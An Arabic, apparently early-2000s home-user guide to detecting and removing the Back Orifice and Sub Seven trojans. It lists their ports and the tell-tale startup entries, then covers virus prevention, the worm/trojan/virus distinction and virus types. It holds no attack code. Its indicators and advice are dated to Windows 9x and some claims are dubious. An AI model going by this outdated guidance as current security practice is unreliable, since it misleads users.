    2- برنامج Black Orifice : الفجوة السوداء ثاني اشهر برنامج للأختراق وأقدمها

    يعطي سيطرة كاملة للمخترق وابرز اصدارته السابقة يحمل النسخة رقم 1.2 وقد

    أصدرت الجمعية التي تصدرة وأسمها "جمعية البقرة الميته" Cult of Death Cow

    اعلانا بأطلاق اصدارة جديدة منه في نهاية الصيف السابق سمته Black Orifice

    2000 . يقوم البرانامج كما ذكرنا بأعطاء سيطرة كاملة للمخترق وتظهر بجهاز

    الضحية نفس الأعراض التي ذكرتها سابقا .

    البحث عن منافذ دخول هذا البرنامج:

    قم بأجراء البحث عن المنافذ كما تم شرحه اعلاه التي عادة يدخل منها برنامج

    الـفجوة السوداء وقارنها بالمنافذ في القائمة ادناه فإن وجدتها من ضمن هذه

    القائمة فأن جهازك يكون قد اخترق عن طريق هذا البرنامج:

    31338

    31337

    31666

    54320

    54321

    أكتشاف ملف التجسس الخاص بهذا البرنامج:

    قم بنفس الأجراء الذي شرحته بالفصل الأول للكشف عن ملف الباتش وبعد الدخول

    لملف تسجيل الويندوز توقف عند Current Version . الأن أنقر على المجلد

    RunServices وابحث عن اي ملف غريب بجهازك له امتداد exe ( أنت اعرف

    بجهازك من الأخرين) . إن وجدت اي ملف غريب لم تشاهده بجهازك من قبل

    فأنقر عليه بزر الماوس الأيمن ثم احذفه واخرج من ملف تسجيل الويندوز . اعد

    تشغيل الجهاز وتوجة الي مجلد الـ System في اعدادات بقائمة إبداء. الأن ابحث

    عن ملف يحمل نفس اسم الملف الغريب الذي حذفته وإذا لم تجده فأنقر قائمة

    (عرض) ثم ( خيارات المجلد) ثم (عرض) من قائمة الملفات المختفيه ثم ضع علامه

    على (اظهار جميع الملفات) ثم انقر تطبيق فموافق. ستعود مرة اخرى الي مجلد

    System فإذا وجدت الملف المطلوب فقم بمسحة وستجد ملفا اخر اسمه windll.dll

    قم بحذفه هو ايضا واعد تشغيل الجهاز . الأن تكون قد قطعت الطريق على

    المخترق وجعلته يبحث عن سراب.

    3- برنامج Sub Seven : من اشهر البرامج المستخدمة بمنطقة الخليج ،

    يسمونه "القنبله" وهو مرغوب ومطلوب وشعبي لبساطته وسهولة تعلمه وسهولة

    الأختراق عن طريقة . يتميز بمخادعة الشخص الذي يحاول ازالته فهو يعيد تركيب

    نفسه تلقائيا بعد حذفه من ملف التسجيل بالويندوز بالطرق الثلاث التي ذكرتها

    في الفصل السابق ولكن هناك طريقة جديدة وخارقه لحذفه سأشرحها لاحقا.

    قبل شرح اعراض الاصابة التي يتركها هذا البرنامج بجهاز الضحية تأكد اولا من

    عدم فتح منافذ الاتصال الخاصة به في جهازك بنفس الطريقة السابقة وقارنها

    بالمنافذ التاليه فإن وجدتها فأن جهازك حتما مصاب وعليك متابعة الموضوع

    للتخلص من المخترق:

    6711

    6776

    1243

    1999

    ___________--أعراض الأصابة : ___________

    تختلف اعراض اصابه هذا البرنامج عن البرنامجين السابقين فمن أهم أعراض

    اصابه هذا البرنامج ظهور رسالة شهيرة عند كل مرة يدخل فيها المخترق لجهاز

    الضحيه وهي ( قام هذا البرنامج بأنجاز عملية غير شرعيه ....) !! تريثوا .. لايعني

    من رأى منكم هذة الرسالة على شاشته أن جهازه قد اخترق .. قلنا بأن في هذا

    البرنامج الكثير من الخبث مما جعله مرغوبا خصوصا بمنطقة الخليج ، فهو حينما

    يعطي رسالة كهذه إنما يوهم المخترق بـأن هذه الرسالة شائعة ومعروفه ومن

    تظهر له فقد تعود عليها فلن يشك مطلقا قبل قراءة هذه الأسطر في أن جهازه

    قد اخترق . كيف نميز بين الرسالة الصادقة البريئة والرسالة الكاذبه الخبيثة؟؟

    1- افتح ملف الـ win.ini الموجود بمجلد الويندوز وابحث في بداية السطور الأولى

    عن اي قيم شبيهة بالقيم التاليه:

    run = xxxx.exe او run = xxxx.dl

    load = xxxx.exe او load = xxxx.dl

    لاحظ أن xxxx تعني اسم الخادم فإذا عثرت على اي قيمة منها فأحذفها فورا

    وبمعنى اخر يجب أن لايظهر اي سطر من السطور اعلاه في بداية السطور

    الأولى لملف الـ win.ini فإن ظهر فأحذفه على الفور.

    2- افتح الملف system.ini الموجود بمجلد الويندوز وستجد بالسطر الخامس العبارة التالية :

    ****l = Explorer.exe

    إن كان جهازك مصابا فستجد شكل العبارة السابقة يكون هكذا:

    ****l = Explorer.exe xxx.exe او ****l = Explorer.exe xxx.exe

    مع العلم بأن xxx هو اسم الخادم زمن اشهر اسمائة : rundlll6.exe و

    Task_Bar.exe

    أن وجدت جهازك مصابا فقم بمسح اسم الخادم فقط ليصبح السطر كما يلي :

    ****l=Explorer.exe

    والأن انت تكون قد قطعت الطريق بين ملف التجسس واسم الخادم الخاص به

    ونشبه ذلك بمن قطع جهاز التنفس عن المريض فلا يبقى الا دفنه وعليك القيام

    بحذف ملف التجسس الخاص بهذا البرنامج كما تم شرحة في الفصل الأول . وبعد

    فكما رأينا خطورة الأختراق فإن الوقاية خير من العلاج والوقاية الأولى هي

    عدم السماح بزرع ملفات التجسس في اجهزتنا فهي حلقة الوصل الأولى لدخول

    المخترقين اليها .

    في الحلقة الدراسية القادمة إن شاء الله سأشرح طرق الوقاية بتفصيل اكثر

    وسنتعلم كيفية استخدام البرامج المضادة لبرامج الاختراقات التي تم شرحها

    اليوم وايضا سنصل لمحور حديث هذة الحلقات الدراسية وهو الدفاع الذاتي .
    بعض طرق الوقاية من الفيروسات
    ________________________________________

    الوقاية من الإصابة بالفيروسات
    فحص جميع الأقراص الغريبة أو التي استخدمت في أجهزة أخرى قبل استخدامها.
    تهيئة جميع الأقراص اللينة المراد استخدامها على جهازك.
    عدم تنفيذ أي برنامج مأخوذ من الشبكات العامة مثل الإنترنت قبل فحصه.
    عدم إقلاع الكمبيوتر من أي قرص لين قبل التأكد من خلوه من الفيروسات.
    عدم ترك الأقراص اللينة في السواقة عندما يكون الجهاز متوقفاً عن العمل.
    التأكد من خلو سواقة الأقراص اللينة قبل إعادة إقلاع الجهاز.
    عدم تشغيل برامج الألعاب على الجهاز ذاته الذي يتضمن البيانات والبرامج الهامة.
    حماية الأقراص اللينة ضد الكتابة لمنع الفيروسات من الإنتقال إليها.
    استخدام برامج أصلية أو مرخصة.
    استخدام كلمة سر لمنع الآخرين من العبث بالكمبيوتر في غيابك.
    الاحتفاظ بنسخ احتياطية متعددة من جميع ملفاتك قبل تجريب البرامج الجديدة.
    تجهيز الكمبيوتر ببرنامج مضاد للفيروسات واستخدامه بشكل دوري.
    تحديث البرامج المضاد للفيروسات بشكل دائم لضمان كشف الفيروسات الجديدة.
    استخدام عدة برامج مضادة للفيروسات ومختلفة في طريقة البحث عنها في الوقت ذاته.
    الاحتفاظ بنسخة DOS نظيفة من الفيروسات ومحمية ضد الكتابة لاستخدامها عند الإصابة.
    الانتباه للأقراص اللينة الواردة من المعاهد والكليات الأماكن التقليدية للفيروسات.
    إغلاق الجهاز نهائياً وإعادة تشغيله عند ظهور عبارة Non Bootable Diskette.
    الفرق بين الدودة Worm والتروجان Trojan والفيروس Virus
    تصيب الدودة Worm أجهزة الكمبيوتر الموصلة بالشبكة بشكل أوتوماتيكي ومن غير تدخل الانسان مما يجعلها تنتشر بشكل أوسع وأسرع من الفيروسات. الفرق بينهما هو أن الديدان لا تقوم بحذف أو تغيير الملفات بل تقوم بإهلاك موارد الجهاز واستخدام الذاكرة بشكل فظيع مما يؤدي إلي بطء ملحوظ جداً للجهاز، ومن المهم تحديث نسخ النظام المستخدم في الجهاز كي يتم تجنب الديدان. ومن المهم أيضاً عند الحديث عن الديدان الإشارة إلي تلك التي تنتشر عن طريق البريد الإلكترونى, حيث يرفق بالرسالة ملف يحتوي على دودة وعندما يشغل المرسل إليه الملف المرفق تقوم الدودة بنشر نفسها إلي جميع رسائل البريد الإلكترونى الموجودة في دفتر عناوين الضحية.
    التروجان عبارة عن برنامج يغري المستخدم بأهميته أو بشكله أو بإسمه إن كان جذاباً, وفي الواقع هو برنامج يقوم بفتح باب خلفي إن صح التعبير بمجرد تشغيله, ومن خلال هذا الباب الخلفي يقوم المخترق باختراق الجهاز وبإمكإنه التحكم بالجهاز بشكل كبير حتى في بعض الأحيان يستطيع القيام بأمور لا يستطيع صاحب الجهاز نفسه القيام بها.
    الفيروس كما ذكرنا عبارة عن برنامج صمم لينشر نفسه بين الملفات ويندمج أو يلتصق بالبرامج. عند تشغيل البرنامج المصاب فإنه قد يصيب باقي الملفات الموجودة معه في القرص الصلب أو المرن, لذا الفيروس يحتاج إلي تدخل من جانب المستخدم كي ينتشر. وبطبيعة الحال التدخل عبارة عن تشغيله بعد أن تم جلبه من البريد الإلكترونى أو تنزيله من الإنترنت أو من خلال تبادل الأقراص المرنة.
    محركات البحث على الإنترنت قد تنقل الفيروسات وتكشف الاسرار
    نشر في مجلة New Scientist في عددها الصادر في نوفمبر2001 أن محركات البحث الجديدة مثل www.google.com من الممكن أن تسمح للمخترقين الهاكر باكتشاف الأرقام السرية وأرقام بطاقات الائتمان وكذلك المساعدة في نشر الفيروسات عبر الإنترنت. حيث تستخدم محركات البحث الجديدة نظام بحث يعمل من خلال مسح ملفات مخبأة عن محركات البحث القديمة التي تبحث من خلال صفحات الويب المكتوبة بلغة الـ HTML . وحذر خبراء في هذا المجال من أن طريقة عمل محركات البحث مثل Google قد توفر وسيلة سهلة للإختراق وكشف أسرار قواعد البيانات غير المحمية. ويجدر القول بأن الملفات من نوع Word أو Acrobat يتم فحصها من الفيروسات بواسطة محرك البحث Google أما الملفات من النوع Lotus 1-2-3 أو MacWrite أو Excel أو PowerPoint أو Rich Text Format فمن المحتمل أن تحتوي على أرقام سرية وأرقام بطاقات الائتمان التي تعتبر أحرف يمكن لمحرك البحث بالبحث عنها في تلك الملفات.
    الفيروسات العربية
    انتشرت في برامج الدردشة Chatting بعض الفيروسات البسيطة التي تخيف بعض الشباب ومن ضمنها التي تقوم بإطفاء الجهاز والتهديد. كما إنها تخاطب صاحب الجهاز بإسمه.
    الفيروسات وأشباه الفيروسات
    وتوجد أنواع أخرى من البرامج، ينطبق عليها تعريف الفيروس جزئياً. تشترك معه في إنها تعمل بدون علم المستخدم، وتقوم بأعمال ضمن الكمبيوتر مصممة عمداً لتنفيذها. ومن هذه الأنواع: الديدان worms، وأحصنة طروادة Trojan horses، وبرامج الإنزال droppers. وتعتبر كل هذه البرامج بما فيها الفيروسات، جزءاً من فئة أكبر تدعى البرامج الماكرة Malware، وهي مشتقة من عبارة Malicious-Logic Software. والدودة برنامج يعيد إنتاج نفسه، لكنها لا تلوث برامج أخرى. تنسخ الدودة نفسها من وإلي الأقراص المرنة، أو عبر الشبكات، ويعتمد بعضها على الشبكة في إنجاز عملها. تستخدم إحدى أنواع الديدان - وهي الدودة المضيفة Host Worm - الشبكة لنسخ نفسها فقط إلي أجهزة الكمبيوتر المتصلة بالشبكة. بينما توزع الدودة الشبكية Network Worm أجزاءها على عدة أجهزة كمبيوتر، وتعتمد على الشبكة فيما بعد لتشغيل هذه الأجزاء.
    ويمكن أن تظهر الديدان على أجهزة كمبيوتر منفصلة، فتنسخ نفسها إلي أماكن متعددة على القرص الصلب. ينتمي مفهوم قنبلة Bomb الكمبيوتر إلي هذه الفئة، إذ تبنى القنابل ضمن البرمجيات الماكرة كواسطة لتنشيطها. وتبرمج القنابل لتنشط عند حدوث حدث معين. تنشط بعض القنابل في وقت محدد اعتماداً على ساعة الكمبيوتر. فيمكن برمجة قنبلة مثلاً لمسح كافة الملفات ذات الامتداد Doc. من قرصك الصلب عشية رأس السنة الميلادية أو لعرض رسالة على الشاشة في اليوم المصادف لعيد ميلاد شخصية مشهورة. وتعمل بعض القنابل تحت شروط أو أحداث أخرى فيمكن أن تنتظر القنبلة إلي أن يتم تشغيل برنامج معين عشرين مرة مثلاً، وعندها تمسح ملفات القوالب Templates الخاصة بهذا البرنامج. ومن وجهة النظر هذه تعتبر القنابل مجرد برامج جدولة زمنية ماكرة. أما برامج الإنزال Droppers فصممت لمراوغة برامج مكافحة الفيروسات وتعتمد على التشفير غالباً لمنع اكتشافها. ووظيفة هذه البرامج عادة نقل وتركيب الفيروسات، فهي تنتظر لحظة حدوث أمر معين على الكمبيوتر لكي تنطلق وتلوثه بالفيروس المحمول في طياتها. ويمكننا النظر إلي الفيروسات كحالات خاصة من البرمجيات الماكرة، إذ يمكن للفيروسات الانتشار بواسطة برامج الإنزال ولا يشترط ذلك وهي تستخدم مفهوم برامج الديدان لإعادة إنتاج نفسها. ولا تعتبر الفيروسات مماثلة لأحصنة طروادة من الناحية التقنية، إلا إنها تشابهها في نقطتين: فهي تنفذ أعمالاً لا يريدها المستخدم وتحول البرنامج الذي تلتصق به إلي حصان طروادة عملياً تختبئ داخله وتعمل عندما يعمل البرنامج وتنفذ أعمالاً غير مرغوبة.
    التروجان Trojan Horse
    يسمي النوع الثاني من البرمجيات الماكرة "حصان طروادة"، نسبة للأسطورة الإغريقية الواردة في ملحمة الأوديسا لهوميروس، حيث تختبئ ضمن برامج يبدو مظهرها بريئاً وعندما يشغل المستخدم واحداً من هذه البرامج، ينشط الجزء الماكر ويقوم بعمل معين مصمم له.
    أعراض التروجان
    بإمكان التروجان أن ينتقل عبر الإنترنت أثناء تبادل الملفات أو الصور أو إجراء عمليات الدردشة. ويأتى على فترات زمنية ثم يعقبها طلب الصديق إرسال ملف وبالطبع سوف تستقبل الملف وسيكون عبارة عن التروجان الذي سيصيب جهازك والذى يمارس نفس الفعل التخريبي مع أصدقائك، وهكذا ينتشر إلى ما لا نهاية. وإذا اراد صديق لك جهازه مصاب بهذا التروجان - نقل ملف إليك فلن ينتقل الملف المتفق عليه، بل سينقل هذا التروجان نسخة من نفسه إليك وهكذا. كيف تتأكد ان جهازك لم يصب بعد بالتروجان سنأخذ على سبيل المثال برنامج Messenger الذى يقوم بفتح مجلد خاص بملفات الاصدقاء يسمى في الغالب C:\My ********s\Messenger Service Received Files أدخل إلى هذا المجلد وقم بإلغاء كل ما فيه من ملفات .. وإذا كان هناك بعض الملفات التي لا تريد إلغاءها، فاستبدل عملية الإلغاء بنقل جميع الملفات إلى مجلد جديد. إذا تمت عملية النقل فجهازك سليم وإذا رفض أحد الملفات الإلغاء أو النقل فمعناه أن جهازك مصاب.
    إذا وجدت ان جهازك مصاب بهذا التروجان قم بما يلى :
    1-افتح القائمة Start ومنها اختر الأمر Run
    2-- اكتبmsconfig مع التأكد من صحة الحروف كما بالشكل رقم (1) ثم انقر Ok.
    3-سيظهر لك مربع الحوار System Configuration Utility كما بالشكل رقم (2) اختر علامة التبويب Start Up.
    4-- تابع جيداً كل أسماء الملفات الموجودة, إذا وجدت علامة أمام ملف مساره بهذا الشكل C:\My ********s\Messenger Service Received Files إلغ هذه العلامة فوراً واضغط موافق وارجع الى المجلد السابق وقم بإلغاء كل الملفات التي بداخل المجلد My ********s\Messenger Service Received Files:\c
    5-أدخل الانترنت ثم افتح برنامج Messenger ثم غير كلمة السر لأن من أخطر أضراره السطو على كلمة السر.
    كيف تتلافى التروجان
    دائما عندما تطلب من صديق نقل ملف إليك, اطلب منه أن يعرفك على إسم الملف قبل النقل ثم تابع إسم الملف أثناء عملية النقل إذا اختلف الإسم اضغط زر الإلغاء فوراً مع الإنتباه للرسائل الغريبة.

    ذكاء الفيروسات في ازدياد
    نجح مبدأ فيروس الماكرو، لأن لغات البرمجة أمنت إمكانية الوصول إلي الذاكرة والأقراص الصلبة. وهذا ما أمنته التقنيات الحديثة أيضاً، بما فيها عناصر تحكم ActiveX، وبريمجات جافا Java ******s. صحيح أن هذه التقنيات صممت مع ضمان حماية القرص الصلب من برامج الفيروسات حيث تعد جافا أفضل من ActiveX في هذا المجال، لكن الحقيقة أن هذه البرامج تستطيع تركيب نفسها على جهازك بمجرد زيارتك لموقع ويب. ومن الواضح أن أجهزتنا ستكون أكثر عرضة لمخاطر الفيروسات والبرمجيات الماكرة الأخرى، مع ازدياد تشبيك أجهزة الكمبيوتر ببعضها وبشبكة إنترنت، خصوصاً مع المزايا التي تعدنا بها الإنترنت لإجراء ترقية نظم التشغيل عبرها .
    إن أقل ما يوصف به مطورو الفيروسات هو مهارتهم وقدرتهم الفذة على الابتكار، فهم يخرجون إلينا دائماً بطرق جديدة لخداع برامج مكافحة الفيروسات. فمثلاً تضلل الفيروسات المتسللةStealth Viruses الجديدة برامج مكافحة الفيروسات بإيهامها أن الأمور تسير على ما يرام، ولا يوجد أي مؤشر على وجود فيروس. كيف؟ يعتمد مبدأ عمل الفيروس المتسلل على الإحتفاظ بمعلومات عن الملفات التي لوثها ثم الانتظار في الذاكرة، ومقاطعة عمل برامج مكافحة الفيروسات خلال بحثها عن الملفات المعدلة وإعطائها المعلومات القديمة التي يحتفظ بها عن هذه الملفات بدلاً من السماح لها بالحصول على المعلومات الحقيقية من نظام التشغيل! أما الفيروسات متغيرة الشكل Polymorphic Viruses، فتعدل نفسها أثناء إعادة الإنتاج مما يجعل من الصعب على برامج مكافحة الفيروسات التي تبحث عن نماذج معينة من مثل هذا الفيروس أو اكتشاف كافة أشكاله الموجودة وبالتالي تستطيع الفيروسات الناجية الإستمرار وإعادة إنتاج أشكال جديدة. وتظهر أنواع جديدة من الفيروسات إلي حيز
    الوجود بشكل دائم، مع استمرار لعبة القط والفأر بين مطوري الفيروسات ومنتجي برامج مكافحتها. وأغلب الظن أن الفيروسات ظهرت لتبقى إلي ما شاء الله.

    الدوافع وراء كتابة برامج الفيروسات المدمرة
    ربما تصل قيمة الأضرار التي سببها ما يعرف بفيروس "الحب" للشركات ومستخدمي الكمبيوتر في أنحاء العالم إلي 10 مليارات دولار. ولكن لماذا يجهد بعض الناس أنفسهم في كتابة شيء يؤدي إلي مثل هذا التدمير؟ يلجأ بعض مبدعي الفيروسات لذلك من أجل حب الإبداع المحض، ليروا إلي أي مدى يستطيعون كتابة برنامج محكم، وإلي إي مدى سيكون هذا مؤثراً، وإلي أي مدى يمكنهم إخفاءه. لكن معظم كاتبي برامج الفيروسات ممن يكتبونها بدافع التحدي لا يطلقون هذه الفيروسات لتعيث فساداً في أجهزة الكمبيوتر فى العالم. لكنهم بدلاً من ذلك يتبادلون هذه البرامج مع أمثالهم من كتاب برامج الفيروسات, إنهم يسعون إلي إبراز قدراتهم على الإبداع لدى نظرائهم.
    الحاجة إلي الشهرة
    لكن هناك جانباً سيئاً لهذه الحاجة إلي إثبات القدرة. ويعتقد كيفين بولسين وهو أحد من مارسوا التسلل إلي مواقع الإنترنت في السابق أن البراهين تشير إلي أن الدافع وراء ما عرف بفيروس "الحب" هو إثبات الذات لدى شاب في مقتبل العمر. وقال بولسين إن عناصر المهارة والخبث والحيلة في مثل هذا الهجوم تغري الشباب. وقال بولسين إنه كان في السابعة عشرة من عمره حينما تسلل إلي موقع وزارة الدفاع الأمريكية، ثم قضى خمس سنوات بعد ذلك في السجن بسبب جرائم أخرى تتعلق بالكمبيوتر. وأضاف بولسين أن كتابة 30 أو 40 سطراً لخلق فيروس يجعل من عملك خبراً يتصدر نشرات الأخبار في العالم وهو بطبيعة الحال أمر يفتن الشباب. ويختلف المختصون في مدى البراعة والخبرة التي قد يحتاجها كاتب برنامج فيروس مثل فيروس الحب .. ويقول بولسين إن فيروس "الحب" يبدو أكثر تقدماً من الهجمات السابقة التي أثرت في بعض مواقع الإنترنت المشهورة سابقاً. ففي هذا الفيروس استغل المنشئ برنامجاً موجوداً بالفعل على الإنترنت ووضعوه على بعض أجهزة الكمبيوتر غير المؤمنة.
    أوهام وسائل الإعلام
    لكن خبير سلامة الكمبيوتر "إيرا وينكلر" يستخف بهذه الفكرة القائلة بأن فيروس "الحب" تطلب براعة لإنشائه ويقول إن هذا وهم روجته وسائل الإعلام، فمثل هذا الفيروس الذي ليس سوى برنامج بسيط يكرر نفسه لا يحتاج إلي ذكاء, فكل ما على المبرمج أن يفعله هو أن ينسخ برنامجاً موجوداً بالفعل على الإنترنت، وهذا ليس بحاجة إلي ذكاء. إن هؤلاء الأشخاص إنما يشبعون رغباتهم المريضة في الشهرة. ويتفق خبراء سلامة الإنترنت على أن كاتبي برامج الفيروسات ربما لا يدركون مدى الأضرار التي قد تسببها فيروساتهم عندما تنطلق من عقالها. وأشار بولسين إلي أول فيروس كبير تتعرض له أجهزة الكمبيوتر، وكان يعرف بإسم دودة موريس، حيث أصاب 10% من أجهزة الكمبيوتر المتصلة بالإنترنت في عام 1988, والبرنامج كتبه شاب إسمه "روبرت موريس" في الثالثة والعشرين من عمره وأطلقه من مختبر معهد ماساسوشيتس. كان من المفترض أن تترك دودة موريس نسخة من نفسها على كل جهاز كمبيوتر، لكن موريس ارتكب خطأ أدى إلي تكرار الدودة لنفسها مرة بعد أخرى إلي ما لا نهاية مما أغرق الإنترنت بفيض منها. ولذلك لا يندهش خبراء سلامة الإنترنت إذا قيل لهم إن كاتبي برامج الفيروسات يعجبون من الأضرار التي سببها فيروس

    معلومات هامة حول الفيروسات
    ________________________________________

    الفيروسات
    Viruses
    بدأ ظهور أول فيروس سنة 1978م أو قبلها بقليل ولم تأخذ المشكلة شكلها الحالي من الخطورة إلا مع إنتشار استخدام
    شبكة الإنترنت ووسائل الإتصالات المعقدة ومنها البريد الإلكتروني. حيث أمكن ما لم يكن ممكناً من قبل من ناحية مدى انتشار الفيروس ومدى سرعة انتشاره.

    لماذا سمي الفيروس بهذا الإسم؟
    تطلق كلمة فيروس على الكائنات الدقيقة التي تنقل الأمراض للإنسان وتنتشر بسرعة مرعبة. وبمجرد دخولها إلي جسم الإنسان تتكاثر وتفرز سمومها حتى تسبب دمار الأجهزة العضوية للجسم . والفيروس عندما يدخل إلي الكمبيوتر يعمل نفس التأثيرات ونفس الأفعال وله نفس قدرة التكاثر وربط نفسه بالبرامج حتى يسبب دمار الكمبيوتر دماراً شاملاً. وهناك بعض أوجه الشبه بين الفيروس الحيوي والفيروس الإلكتروني منها:
    1-يقوم الفيروس العضوي بتغيير خصائص ووظائف بعض خلايا الجسم. وكذلك الفيروس الإلكتروني يقوم بتغيير خصائص ووظائف البرامج والملفات.
    2-يتكاثر الفيروس العضوي ويقوم بإنتاج فيروسات جديدة. كذلك الفيروس الإلكتروني يقوم بإعادة إنشاء نفسه منتجاً كميات جديدة.
    3-الخلية التي تصاب بالفيروس لا تصاب به مرة أخرى, أي يتكون لديها مناعة. وكذلك الحال مع الفيروس الإلكتروني حيث إنه يختبر البرامج المطلوب إصابتها فإن كانت أصيبت من قبل لا يرجع إليها، بل ينتقل إلي برامج أخرى وملفات جديدة.
    4-الجسم المصاب بالفيروس قد يظل مدة بدون ظهور أي أعراض (فتره الحضانة). وكذلك البرامج المصابة قد تظل تعمل مدة طويلة بدون ظهور أي أعراض عليها.
    5- يقوم الفيروس العضوي بتغيير نفسه حتى يصعب اكتشافه (الإيدز مثلاً). وكذلك الفيروس الإلكتروني فإنه يتشبه بالبرامج حتى لا يقوم أي مضاد للفيروسات باكتشافه.
    تعريف الفيروس
    يوجد تعريفان للفيروس هما:

    الفيروس عبارة عن كود برمجي (شفرة) الغرض منها إحداث أكبر قدر من الضرر. ولتنفيذ ذلك يتم إعطاؤه القدرة على ربط نفسه بالبرامج الأخرى عن طريق التوالد والانتشار بين برامج الحاسب وكذلك مواقع مختلفة من الذاكرة حتى يحقق أهدافه التدميرية.

    الفيروس عبارة عن برنامج تطبيقي يصممه أحد المخربين لتدمير البرامج والأجهزة. والتعريف الأول لأن الفيروس لا يستطيع أن يعمل بمفرده دون وسط ناقل. هل سمعت يوماً عن فيروس وجد منفرداً ؟! وإلا كيف يستطيع أن ينتقل من حاسب لآخر لأن أي عاقل لن يقبل أن يرسل له فيروس بصورته المجردة.
    كيف يعمل الفيروس
    يحاول كل فيروس تقريباً أن يقوم بنفس الشيء. وهو الإنتقال من برنامج إلي آخر ونسخ الشفرة إلي الذاكرة ومن هناك تحاول الشفرة نسخ نفسها إلي أي برنامج يطلب العمل أو موجود بالفعل قيد العمل، كما تحاول هذه الشفرة أن تغير من محتويات الملفات ومن أسمائها أيضاً دون أن تعلم نظام التشغيل بالتغيير الذي حدث، مما يتسبب في فشل البرامج في العمل. وتعرض أيضاً رسائل مزعجة ومن ثم تخفض من أداء النظام أو حتى تدمر النظام كاملاً. وهناك بعض الفيروسات التى تلتقط عناوين البريد الإلكتروني ثم تؤلف رسائل نيابة عنك وترسلها إلي جميع العناوين الموجودة في مجلد العناوين لديك مرفقة بملفات ملوثة بالفيروس.
    شروط الفيروس
    1- أن يكون ذا حجم صغير لكي لا يتم الانتباه إليه.
    2- أن يعتمد على نفسه في التشغيل أو على البرامج الأساسية أو عن طريق الارتباط بأحد الملفات.
    3- أن يكون ذا هدف ومغزى.
    العوامل التي أدت إلي سرعة انتشار الفيروسات:
    1- التوافقية Compatibility وتعني قدرة البرنامج الواحد على أن يعمل على حاسبات مختلفة وعلى أنواع وإصدارات مختلفة من نظم التشغيل، وهذا العامل رغم تأثيره الإيجابي والهام بالنسبة لتطوير الحاسبات إلا أن أثره كان كبيراً في سرعة انتشار الفيروسات. كما ساعدت أيضاً البرامج المقرصنة على سرعة انتقال الفيروسات.
    2- وسائل الإتصالات Communications كان لوسائل الإتصالات الحديثة السريعة دور هام في نقل الفيروسات. ومن أهم هذه الوسائل: الشبكات بما فيها شبكة الإنترنت. وإلا لما استطاع فيروس الحب أن يضرب أجهزة في أمريكا رغم أن مصدره الفلبين.
    3- وسائط التخزين مثل الأقراص المرنة Floppy والأقراص المضغوطة CD وخاصة إذا كانت صادرة عن جهاز مصاب.
    خصائص الفيروسات
    1- القدرة على التخفي
    للفيروسات قدرة عجيبة على التخفي والخداع عن طريق الإرتباط ببرامج أخرى. كما تم أيضاً تزويد الفيروسات بخاصية التمويه والتشبه. حيث أن الفيروس يرتبط ببرنامج يقوم بأعمال لطيفة أو له قدرة عرض أشياء مثيرة وعند بداية تشغيله يدخل إلي النظام ويعمل على تخريبه. وللفيروسات عدة وسائل للتخفي منها ارتباطها بالبرامج المحببة إلي المستخدمين. ومنها ما يدخل النظام على شكل ملفات مخفية بحيث لا تستطيع ملاحظة وجوده عن طريق عرض ملفات البرنامج. وبعض الفيروسات تقوم بالتخفي في أماكن خاصة مثل ساعة الحاسب وتنتظر وقت التنفيذ. كما أن بعضها تقوم بإخفاء أي أثر لها حتى أن بعض مضادات الفيروسات لا تستطيع ملاحظة وجودها ثم تقوم بنسخ نفسها إلي البرامج بخفة وسرية.
    2- الإنتشار
    يتميز الفيروس أيضاً بقدرة هائلة على الإنتشار, سواء من ناحية السرعة أو الإمكانية.
    3- القدرة التدميرية
    تظهر عندما يجد الفيروس المفجر الذي يبعثه على العمل كأن يكون تاريخ معين كفيروس تشرنوبيل.
    أنواع الفيروسات
    فيروسات قطاع التشغيل Boot Sector
    تعتبر الفيروسات التي تصيب مقطع التشغيل في الأقراص أكثر انتشاراً في العالم، إذ تصيب المقطع التشغيلي في الأقراص المرنة، أو مقطع نظام تشغيل "DOS" في الأقراص الصلبة. وربما إذا عرفنا كيف تنتشر هذه الفيروسات أمكننا أن نتقي شرها. لقد وصلك اليوم قرص مرن يحتوي على معلومات مهمة لمشروع تعمل عليه مع عدد من الزملاء، وربما لا يعرف زميلك الذي أرسل لك هذا القرص أنه يحتوي على فيروس يصيب المقطع التشغيلي للقرص الصلب بالعطب. ووضعت القرص في محرك الأقراص وبدأت العمل كالمعتاد، وإلي الآن لم يقم الفيروس بأي نشاط يذكر، وأقفلت جهازك بعد أن انتهيت من العمل. وفي اليوم التالي قمت بتشغيل الكمبيوتر وما زال القرص المرن قابعاً داخل الجهاز عندها يحاول الكمبيوتر الإقلاع من القرص المرن. وتبدأ الكارثة حيث يقوم الفيروس بنسخ نفسه في الذاكرة بدلاً من برامج التشغيل المعروفة ويقوم بتشغيل نفسه بعدها. وقد تنتبه إلي وجود القرص المرن وتسحبه من الجهاز وتحاول التشغيل من القرص الصلب وعندها يقوم الفيروس بشطب ملفات الإقلاع الموجودة أصلاً في نظام تشغيل "DOS" ويحل محلها. وإلي هنا يبدو كل شيء طبيعياً، إلي أن تحاول القراءة أو الكتابة من القرص الصلب فلا يمكنك ذلك، ويقوم الفيروس بمخاطبة القرص المرن بنسخ نفسه عليه، وتقوم بكل حسن نية بإعطاء ذلك القرص إلي صديق أو زميل لتتكرر العملية من جديد.
    فيروسات الملفات
    تلصق هذه الفيروسات نفسها مع ملفات البرامج التنفيذية مثل command.com أوwin.com .
    الفيروسات المتعددة الملفات
    تنسخ هذه الفيروسات نفسها في صيغة أولية ثم تتحول إلي صيغ أخرى لتصيب ملفات أخرى.
    الفيروسات الخفية (الأشباح)
    وهذه فيروسات مخادعة. إذ إنها تختبئ في الذاكرة ثم تتصدى لطلب تشخيص وفحص قطاع التشغيل ثم ترسل تقريراً مزيفاً إلي السجل بأن القطاع غير مصاب.
    الفيروسات متعددة القدرة التحولية
    وهذه الفيروسات لها القدرة الديناميكية على التحول وتغيير الشفرات عند الإنتقال من ملف إلي آخر لكي يصعب اكتشافها.
    الفيروسات متعددة الأجزاء Multipartite
    يجمع هذا النوع الذى يدعى الفيروس "متعدد الأجزاء" Multipartite بين تلويث قطاع الإقلاع مع تلويث الملفات في وقت واحد.
    فيروسات قطاع الإقلاع
